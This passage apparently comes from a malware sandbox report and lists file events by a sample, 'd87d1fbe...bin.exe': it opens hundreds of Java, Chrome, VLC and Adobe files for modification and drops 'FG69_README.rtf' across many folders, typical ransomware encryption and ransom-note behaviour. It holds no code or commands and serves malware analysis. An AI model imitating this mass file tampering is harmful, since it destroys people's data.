Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-io-ui.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\org-netbeans-core_visualvm.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\core_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\security\blacklist d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\en-GB.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Chisinau d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\RepairUnregister.odt d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ru.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\klist.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\include\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sampler_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Monterrey d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\Vdk10.rst d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_hu.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\security\local_policy.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\00_musicbrainz.luac d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\sw.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sampler_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console_1.0.300.v20131113-1212.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Melbourne d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nome d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Davis d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Simferopol d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\PST8PDT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-templates_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\splash.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jcmd.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\vlc.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\es.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\MANIFEST.MF d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Pohnpei d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_cs.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.update.configurator.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\java.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-execution_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\YST9YDT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\ECLIPSE_.RSA d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Cordoba d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ust-Nera d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiler_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\am.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.descriptorProvider.exsd d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\javafx.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text_3.5.300.v20130515-1451.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\AST4ADT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Copenhagen d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\zh-CN.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Miquelon d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\logging.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-utilities_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\javacpl.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Srednekolymsk d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\DigSig.api d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Brussels d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_fr.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\serialver.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\http\js\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\VideoLAN Website.url d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.runtime_3.10.0.v20140318-2214.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.filesystem_1.4.100.v20140514-1614.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Stanley d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-execution_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\pl.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\chrome.exe.sig d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.commons.codec_1.6.0.v201305230611.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Rarotonga d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.xml_1.3.4.v201005080400.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Gaza d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Rainy_River d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Chicago d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-core_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util-lookup_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-api-caching_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-5 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Maldives d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\LINEAR_RGB.pf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-execution_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.runtime_0.10.0.v201209301036.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_zh_TW.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\profile.jfc d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Brisbane d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ko_KR.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\management\jmxremote.password.template d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Denver d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\console_view.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\apt.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\fontconfig.properties.src d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\sunmscapi.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Rome d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\bbc_co_uk.luac d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\meta-index d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Cocos d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\South_Georgia d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Tell_City d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\tools.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kabul d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Tahiti d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Prague d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk_1.0.300.v20140407-1803.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-api_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\New_York d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\MEIPreload\preloaded_data.pb d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javafxpackager.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\jawt.lib d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Los_Angeles d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\chrome_100_percent.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Enderbury d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\vlc16x16.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\hr.pak 